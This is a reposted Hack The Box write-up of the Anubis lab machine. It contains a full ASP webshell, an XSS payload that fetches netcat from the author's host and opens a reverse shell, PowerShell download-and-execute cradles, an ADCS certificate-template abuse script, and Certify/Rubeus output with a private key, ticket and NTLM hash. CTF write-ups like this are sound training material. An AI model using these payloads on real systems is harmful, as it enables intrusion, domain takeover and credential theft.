45

Anubis: Hack The Box Walkthrough

 2 years ago
source link: https://hackso.me/anubis-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

This post documents the complete walkthrough of Anubis, a retired vulnerable VM created by 4ndr34z, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Anubis is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.11.102 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-16 03:46:36 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 593/tcp on 10.10.11.102
Discovered open port 443/tcp on 10.10.11.102
Discovered open port 49727/tcp on 10.10.11.102
Discovered open port 445/tcp on 10.10.11.102
Discovered open port 135/tcp on 10.10.11.102

Not much going on. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -135,443,445,49727 -A --reason 10.10.11.102 -oN nmap.txt
...
PORT    STATE SERVICE       REASON          VERSION
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
443/tcp open  ssl/http      syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Issuer: commonName=www.windcorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-24T19:44:56
| Not valid after:  2031-05-24T19:54:56
| MD5:   e2e7 86ef 4095 9908 14c5 3347 cdcb 4167
|_SHA-1: 7fce 781f 883c a27e 1154 4502 1686 ee65 7551 0e2a
|_ssl-date: 2021-08-16T04:07:24+00:00; 0s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp open  microsoft-ds? syn-ack ttl 127
593/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0

I’d better map www.windcorp.htb to 10.10.11.102 in /etc/hosts. This is what the site looks like.

Directory/File Enumeration

Let’s see what we can glean from gobuster and SecLists.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -k -t 20 -x asp,txt -u
 https://www.windcorp.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://www.windcorp.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/08/16 05:59:06 Starting gobuster in directory enumeration mode
===============================================================
https://www.windcorp.htb/test.asp             (Status: 200) [Size: 518]
https://www.windcorp.htb/assets               (Status: 301) [Size: 155] [--> https://www.windcorp.htb/assets/]
https://www.windcorp.htb/forms                (Status: 301) [Size: 154] [--> https://www.windcorp.htb/forms/]
https://www.windcorp.htb/services.asp         (Status: 200) [Size: 21596]
https://www.windcorp.htb/preview.asp          (Status: 200) [Size: 3803]
https://www.windcorp.htb/save.asp             (Status: 302) [Size: 157] [--> https://www.windcorp.htb/preview.asp]
https://www.windcorp.htb/readme.txt           (Status: 200) [Size: 215]
https://www.windcorp.htb/changelog.txt        (Status: 200) [Size: 1386]

===============================================================
2021/08/16 05:59:42 Finished
===============================================================

Contact

Interestingly, there’s a contact form that refers to save.asp. Suppose we send a message like so.

We see this in test.asp.

Looks like we are able to execute VBScript.

ASP Webshell

Kali Linux has just the right ASP webshell for the job.

/usr/share/webshells/asp/cmdasp.asp
<%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
  End If

%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
  If (IsObject(oFile)) Then
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>

When we send the above in a message to save.asp, we get this in test.asp.

Whoa, it can’t be this easy, right?

Windows Server Container

I think we are inside a Windows Server Container.

Foothold

Let’s download a copy of nc64.exe and save it as C:\temp\cute.exe.

And run a reverse shell back to us.

A reverse shell appears in our netcat

Breaking Out of a Windows Container

During enumeration of the container, I was lucky to find ConsoleHost_history.txt where the creator(s) were kind enough to leave clues on how to proceed.

Enter PowerProxy—A SOCKS proxy with reverse proxy capabilities. With PowerProxy, I’m able to set up a SOCKS4 proxy in the container, allowing me to port-scan hosts in the same network as the container otherwise not accesible to me. Recall the container’s IP address is 172.21.132.45 and the gateway’s IP address is 172.21.128.1? Normally the gateway is the host.

Run this in your machine.

python3 reverse_proxy_handler.py -p 8080

Run this in the container.

start powershell -c "Import-Module \temp\PowerProxy.ps1; Start-ReverseSocksProxy 10.10.14.64 -Port 8080"

Let’s scan ports commonly found in Windows.

proxychains -q nmap -sT -T4 -n -Pn 172.21.128.1 -p80,443,445,5985 --open 2>/dev/null
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-09 15:30 UTC
Nmap scan report for 172.21.128.1
Host is up (0.028s latency).
Not shown: 1 closed port
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

This is what 80/tcp looks like.

Software Portal

The software offering looks interesting. The URL to 7-zip looks like this.

http://softwareportal.windcorp.htb/install.asp?client=172.21.129.14&software=7z1900-x64.exe

What if I change the client IP address to my own and fire tcpdump with the following filter to see what type of traffic comes in?

Interesting. The software portal is trying to connect to WinRM on my machine. Let’s give it what it wants. The latest version Responder now offers rogue WinRM to capture NTLMv2 hashes.

Awesome. Let’s run the hash through JtR and see what we have.

We have a set of credentials (windcorp\localadmin:Secret123).

SMB Enumeration

Let’s see what we can glean with these credentials.

Especially what’s in Shared.

CVE-2021-28079 - Jamovi <= 1.16.18 Cross-Site Scripting Vulnerability

It’s no wonder the creator of this box is one of the people who discovered this vulnerability. The column-name is vulnerable to XSS in the ELectonJS Framework. An attacker can make a .OMV document containing a payload.

Notice the last-modification date of Whatif.omv in Shared\Documents\Analytics above is more current than the rest of the .OMV files? I suspect there’s scheduled task that opens Whatif.omv with a vulnerable Jamovi at some point in time.

Taking a leaf from the POC video, we can change the column-name to the following XSS payload in metadata.json

The XSS payload will fetch jamovi.js from Python’s http.server and hopefully Jamovi will execute the JS. This is what jamovi.js looks like.

jamovi.js
const p = require("child_process");
p.exec("powershell -c iwr http://10.10.14.64:8000/nc64.exe -outf \\windows\\system32\\spool\\drivers\\color\\cute.exe");
p.exec("start \\windows\\system32\\spool\\drivers\\color\\cute.exe 10.10.14.64 4321 -e cmd.exe");

I’ve chosen to download nc64.exe from Python’s http.server and save it to a Windows world-writable folder as cute.exe and then use it to run a reverse shell back to me.

The file user.txt is in diegocruz’s Desktop.

Privilege Escalation

During enumeration of diegocruz’s account, I notice that Active Directory Certificate Services (ADCS) is installed.

Certified Pre-Owned

Read this post for details on attacking misconfigured ADCS. Note that the building of Certify and Rubeus in Visual Studio is beyond the scope of this write-up.

Now check this out with Certify.exe find.

The domain group WINDCORP\webdevelopers has full control over the Web Certificate Template. And guess what—diegocruz is the only member in the group.

Here’s the game plan.

  1. Reconfigure the Web template to issue certificate for Smartcard Logon
  2. Enroll Administrator to get a certificate for Smartcard Logon
  3. Use Rubeus to obtain TGT for Administrator and reveal NTLM hash
  4. Profit!

Step 1 - Reconfigure Web template

Step 1 can be easily completed with the help of PoshADCS cmdlet Set-ADCSTemplate.

IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/PowerView.ps1
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/ADCS.ps1
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/Reconfigure-Template.ps1")

Where Reconfigure-Template.ps1 is

Reconfigure-Template.ps1
$Properties = @{}
$Properties.Add('mspki-certificate-name-flag',1)
$Properties.Add('pkiextendedkeyusage',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))
$Properties.Add('msPKI-Certificate-Application-Policy',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))
$Properties.Add('flags','CLEAR')
$Properties.Add('mspki-enrollment-flag',0)
$Properties.Add('mspki-private-key-flag',256)
$Properties.Add('pkidefaultkeyspec',1)

Set-ADCSTemplate -Name Web -Properties $Properties -Force

After adding Smartcard Logon to Web certificate template this is what it looks like.

Step 2 - Enroll Administrator to get a certificate for Smartcard Logon

Certify has a nifty feature for this step.

.\Certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.

[*] Template                : Web
[*] Subject                 : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : earth.windcorp.htb\windcorp-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 3

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAprOGHBhdZ1VDiMhBbVvwkuEUMxMnNtZD0Yrs5cmA2YD57u2y
FB4FvapRj1POTTHg/p35OfohVTg8urA5A+TLkm0iVweMPjx1SKphFRCDFYFeMWut
mHkbilH2L/XREi/l2K3UMItf/A1Gt4gRqc2MOcQOu0niu0x6YRDAMzRCIF5OAHPo
ZK8ibiRvFPo8QJzk/T/UHnaqX9kbWC9uHglVYAEg4a/fx+6+NmYK4b6/iDiLc+LP
FJz8jcTveYAsE3vsTTvjf+1jFX0ImOQFOQJZ8kKPqiKq7wBMn0rFTTfmicruJyDn
c7Fhr2yePCN4aRLY1i4z3PrMFLt/fbrYHRvrZQIDAQABAoIBAD2plmf6E0LP5UVJ
XfpH0ftiyogCA7VjGH8ANpThLopGDS12OzL50AHSaIzt4Rfo5WMJqFDr1zygqsYb
vVtVXH/zYopyvkufLXsNmw+hpftkeSUqwXHvCmLl4nznHsjtcsXtttmmFIE1n/zv
likLYV1UymY49Gd36KTS/2VxZSx3XNqxwqvDPAe1NclNvSJTv9C+DlzpO/xv9s2U
yGHopnw/QdjzOFaZixkgtYg1rzAapUPsz1TNiFQw1VbcTV6zYCbptacGhfg7BToq
+IlnrCWMct6AUUkaLsV2DqL2fNn8VYwIwCUOlhsZWSKJMKY1BejmzZyLWGAuxQMd
6oFwxBkCgYEAyMUV+vnMUFBKn25gWzjbvEOCgw/RjuZZngWmOTeGjXsOUsOSSvv0
rVlGYpHqclTQ6VRTafKL+9jGyFBYxa1go6XcoJBWQqnhvEQziph+FQ8TEmOPoShP
VscZjJJmkpaoZ6FGNrKXMLM+7cSa6rAj4rJQ54jkSxZ8uGZXtf1NjncCgYEA1I81
UdQsDBpqjes0fyL9j9R6sPnIQ2VD5VhTyyogm/RZEaiMXXacCoqr+WeDdYr+JMn6
x2Oda47Q5aCiuCqU3WFhc7dYTd0In3gbK/MdwWveyLUl6VdkfBxGjVkqlaZ0lULQ
qAibsG2/m4RJZCSLkVq/rpZagHLxvTVOFIz2wAMCgYEAwEGrCMlI0+fvbbje4LwT
/7aONj9hp3wCeYZjZQs8+CLM1oidgNzBs3Z4JlAguBdsbuPndN9lGWi/Aneear3a
exuLqN5PHEtd9VFCIghhRH1JACUDF4poX2sNlkVjoCBRZ9tSR3LBwUsEid/pka/W
zXGAdBfstdL04AhxGb9VE4UCgYAbfMV9Zn2ntwbOgXsRcdnubqDLIBIIvSCxmOGF
JVaANHIMOYqlT4BQUKx6nSs/2RCSe1glzrj9vsM+3q4MON11X3F1wGD3+Lxzutlw
rojLiYKO2/YiHb4N2q44+y3pmlP7NV+8SxivERI1Lz86ZwtxaZXeIu1jLPob6LfH
Ko+CNwKBgEv2XyTCiegLpygk4Z/EAVdwjnTfixrgz7BbjKF5w92EAjN7p1NiA3LQ
LCTNsI+28G+X06z+osE09B7jgFGfU4S3cuSnf8e5bdeFVSp/qdp+KxV6/4p2qoTF
bkFpG69LiAUVS1x2Aa9ly32OWNyk9OnODnPlw9UN/ebdMMHMpnEp
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFwDCCBKigAwIBAgITMwAAAANzu1dpiaKKUQAAAAAAAzANBgkqhkiG9w0BAQsF
ADBFMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYId2luZGNv
cnAxFDASBgNVBAMTC3dpbmRjb3JwLUNBMB4XDTIxMTAxMTAyNDUxM1oXDTIzMTAx
MTAyNTUxM1owWTETMBEGCgmSJomT8ixkARkWA2h0YjEYMBYGCgmSJomT8ixkARkW
CHdpbmRjb3JwMRMwEQYDVQQLEwpNYWluT2ZmaWNlMRMwEQYDVQQDEwpEaWVnbyBD
cnV6MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAprOGHBhdZ1VDiMhB
bVvwkuEUMxMnNtZD0Yrs5cmA2YD57u2yFB4FvapRj1POTTHg/p35OfohVTg8urA5
A+TLkm0iVweMPjx1SKphFRCDFYFeMWutmHkbilH2L/XREi/l2K3UMItf/A1Gt4gR
qc2MOcQOu0niu0x6YRDAMzRCIF5OAHPoZK8ibiRvFPo8QJzk/T/UHnaqX9kbWC9u
HglVYAEg4a/fx+6+NmYK4b6/iDiLc+LPFJz8jcTveYAsE3vsTTvjf+1jFX0ImOQF
OQJZ8kKPqiKq7wBMn0rFTTfmicruJyDnc7Fhr2yePCN4aRLY1i4z3PrMFLt/fbrY
HRvrZQIDAQABo4ICkzCCAo8wOwYJKwYBBAGCNxUHBC4wLAYkKwYBBAGCNxUIsrAi
h4Xrf4bphxiFkKlUxdkzJoaox1ODlPQcAgFkAgECMB8GA1UdJQQYMBYGCCsGAQUF
BwMCBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDApBgkrBgEEAYI3FQoEHDAa
MAoGCCsGAQUFBwMCMAwGCisGAQQBgjcUAgIwHQYDVR0OBBYEFAO2veIkkIixSwzo
4HKZZd06upHdMCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJh
dG9yMB8GA1UdIwQYMBaAFBBQB/Z7ZTloO4v+uzi7R43NuP8YMIHIBgNVHR8EgcAw
gb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXdpbmRjb3JwLUNBLENOPWVhcnRoLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPXdpbmRjb3JwLERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9j
YXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQw
gb4GCCsGAQUFBwEBBIGxMIGuMIGrBggrBgEFBQcwAoaBnmxkYXA6Ly8vQ049d2lu
ZGNvcnAtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9d2luZGNvcnAsREM9aHRiP2NBQ2Vy
dGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5
MA0GCSqGSIb3DQEBCwUAA4IBAQAvHNFwiuG+deSfRxavnDmjBmkpmSWSueXB5wwm
JzY6FZUopcVlwFpcY+NoW+bMAq1d1adJVDKvUfuNOt4scvU1SXUQdghJQEYOChmL
QFzjn1ZsiyiMmBq6pyOPnFCjCMRyDtMkDgwmYnhgYjWYOxEdb5fPUZEj6X5Afrc+
R75ZfS1yzDBwcD45yvTE5qH8AWhpFQq8/5ylyCUv57XUNb8DTfWwTbN+FBzHtw5X
8Ugj6ehNaC0M0d27xtXzukqFvwKAlGYsnMZdfWfmOg2j0oo/Xiul8CybHFuOHoL7
cKx7ljkrznJNyFy79YBdwP2OqRaeBvRhOzKcDd/oeAsF/uHO
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:17.0611875

Step 3 - Use Rubeus to reveal Administrator’s NTLM hash

.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password123 /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'windcorp.htb\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIF1DCCBdCgAwIBBaEDAgEWooIE5DCCBOBhggTcMIIE2KADAgEFoQ4bDFdJTkRDT1JQLkhUQqIhMB+g
      AwIBAqEYMBYbBmtyYnRndBsMd2luZGNvcnAuaHRio4IEnDCCBJigAwIBEqEDAgECooIEigSCBIY1NKx1
      zoCnRgf8altyHaM2dB/OVSxeRciH/Ko6P0TflDyc2gp+w9lbL+57vQnfVsstBZjE0it3uhI19EoFVJVT
      OX4dorF9Qo6UFdC1n7vtinfC6ubOzcwi0Xr0pTVy7SSFLIYVxvbMMXP/0IBFkmYI7o5cYl9+xGWdhaUs
      bvrE15VatVo5eWATRxm7wI4RKzSofhGjpz62DpgWfMLLqCJ1fJWomGUnfeQjYqwk7QmKozoWDYblj7Ll
      PrthM1dEUN3shEMxUIkudwQn/AdRmn/cjNrbih7B59x7H6fSqJLTQINrsqhEFXP8lrwxX16B+Ajzt9As
      od2z1h79wtXtDvtYZs+KZzWKUx4/ySEE8do3cbbF9cqp5LOygrIpmgbBF5HRU/39iQPz0pDsLOWADBRP
      b9nZiPGFWXcr608w8t09TqsGmeKWMM8RwUyxEvtA9C6dR5Zx2xK+hlMRXvT0yZqf7cQukx0sSCQWjq26
      lWmTeJl0ErWDJSeEAJdsRpb92m83kR3ZOjibu3Eb8MsP6P3X9LtTFYOMv+0piDWD7M7gqy2CWBxS8qXb
      s8VkNuihPw1ktGINKbcDNZNvLNcd4/sMSC1OfhfuYQC5xpyyTHZ0k6CCf8I0H5oXOzMv27BpG1MA2azL
      jyhC8Q+EtlxgRlq1vO2y5ekp+bxuPKRYgD86+7+PqQiDsQ6NgpH0U8oEgvC2nwi5C4DJQ0Zj3EbX1asP
      janV1KUbf5hWpC/bCn2oxjfy5x9M0yM40FaOBZiSANddOjKrh4ZLY3yqqTIGhHVAAei9GinSxLBa0C4E
      0wSzqKNOBFn/NcZ445ZForyMUXG29qJ1x4NEcOLItTVHAj9rEDoNG6zqOI9eZ4Z2pVKR7Ah2i9jRykTk
      aW2d/d2hZP6n6HtvOMcupZAtaaH7Lm99zmKmEwa7Yn7ZcytxGLwLZB96ziGrGO0bieggl/+tcARAQ+MF
      iKH5RfxBFqI5kwa6z0VETHop6xRxjEI5XnASbnFFi40Oi6Aangnb8BxispmVZiuMCaN5X7Rm0nZot1Z0
      uhROb8X4WZh5BOGhuBwuyh/57J1E/U+7AihfK93jI2F6be+yvwCv2/1j0Xfk3qMXKHSgASAsdJcJ5qM9
      8JrYYpaN/lJujolVyuwYGzPSOiJ0o1NYKchk80U/UOMayYkTj/HupBsEIknkK9gMUSoLx67cx3G3QLcy
      oewX0o0nmwdJF2w2yaHhAwnOu1FRr06sJ3Qb9ofANnfvIyQ6x35MRrS/PoX2Iol0ilXIeaz3pig9RHQb
      D2ENHetfW3jJ434n1bbB3SehBN9BwQRBpKT4KzuNUeIR7z8q4JIl0Ri4y6w9aDxZni58ibte1O1bPNay
      nhLg9mlXgo1SPZy4ZXsAA97/JIEYIl7DfZvsFXxaqdyTZ4uX3qqf7I1YFmBxs5AIkKWAp5mYtWKJXseu
      7O26NKSop4S8P6ET4T53tvIDl3Ycoj8V+5Ng7c5+9k8okVAow9g8Cc8xmKJlNOB1QGtN/GSPXk8bbHgs
      yZ20mfA/wOvkB822kpajgdswgdigAwIBAKKB0ASBzX2ByjCBx6CBxDCBwTCBvqAbMBmgAwIBF6ESBBCh
      c8LOnWgvr4obwVokk783oQ4bDFdJTkRDT1JQLkhUQqIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3Kj
      BwMFAEDhAAClERgPMjAyMTEwMTEwMzEzMDBaphEYDzIwMjExMDExMTMxMzAwWqcRGA8yMDIxMTAxODAz
      MTMwMFqoDhsMV0lORENPUlAuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0Gwx3aW5kY29ycC5odGI=

  ServiceName              :  krbtgt/windcorp.htb
  ServiceRealm             :  WINDCORP.HTB
  UserName                 :  Administrator
  UserRealm                :  WINDCORP.HTB
  StartTime                :  10/11/2021 5:13:00 AM
  EndTime                  :  10/11/2021 3:13:00 PM
  RenewTill                :  10/18/2021 5:13:00 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  oXPCzp1oL6+KG8FaJJO/Nw==
  ASREP (key)              :  C9671F60EF5739FCCDDA8E0269D003D4

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 3CCC18280610C6CA3156F995B5899E09

Step 4 - Profit!

Armed with Administrator’s NTLM hash, all we need to do is to use Impacket’s psexec.py to get us a shell.

Getting root.txt is a breeze.

:dancer:


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK